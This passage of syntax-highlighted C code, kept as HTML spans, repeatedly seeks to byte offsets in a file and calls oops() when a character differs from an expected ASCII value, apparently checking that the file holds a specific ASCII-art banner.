<span>fseek</span>(fp,<span>333</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>443</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>302</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>170</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>453</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>352</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>605</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>508</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>28</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>25</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>619</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>15</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>26</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>264</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>359</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>144</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>479</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>219</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>471</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>74</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>134</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>413</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>165</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>721</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>400</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>96</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>258</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>392</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>327</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>90</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>656</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>530</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>393</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>109</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>488</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>581</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>63</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>414</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>700</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>597</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>446</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>149</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>312</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>62</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>288</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>456</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>603</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>243</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>463</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>192</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>17</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>132</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>461</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>625</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>193</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>412</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>42</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>196</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>182</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>478</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>394</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>96</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>579</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>688</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>245</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>8</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>657</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>535</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>509</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>344</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>330</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>595</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>81</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>649</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>267</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>140</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>127</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>395</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>481</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>336</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>490</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>218</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>175</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>200</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>362</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>554</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>157</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>91</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>723</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>266</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>513</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>231</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>160</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>452</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>376</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>467</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>195</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>604</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>660</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>416</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>108</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>672</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>179</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>405</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>52</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>18</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>59</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>642</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>123</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>638</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>14</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>564</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>624</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>511</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>545</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>566</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>314</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>704</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>528</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>472</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>408</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>520</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>305</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>225</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>39</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>139</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>294</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>75</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>138</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>385</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>441</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>216</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>503</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>150</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>538</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>646</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>674</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>570</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>164</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>628</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>41</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>431</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>117</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>70</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>489</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>593</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>451</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>263</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>510</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>350</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>290</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>72</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>583</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>43</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>713</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>643</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>415</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>10</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>532</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>696</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>679</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>514</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>620</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>384</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>229</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>45</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>181</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>515</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>47</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>214</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>46</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>277</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>585</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>354</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>614</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>407</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>39</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>113</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>257</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>358</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>502</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>12</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>698</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>282</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>351</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>94</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>529</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>320</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>162</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>714</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>112</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>92</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>101</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>468</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>297</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>269</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>124</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>701</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>152</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>494</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>273</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>398</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>287</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>260</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>7</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>141</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>440</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>626</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>48</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>95</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>648</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>680</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>125</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} <span>fseek</span>(fp,<span>455</span>,SEEK_SET);c=<span>fgetc</span>(fp);<span>if</span>(c != <span>32</span>){<span>oops</span>();} 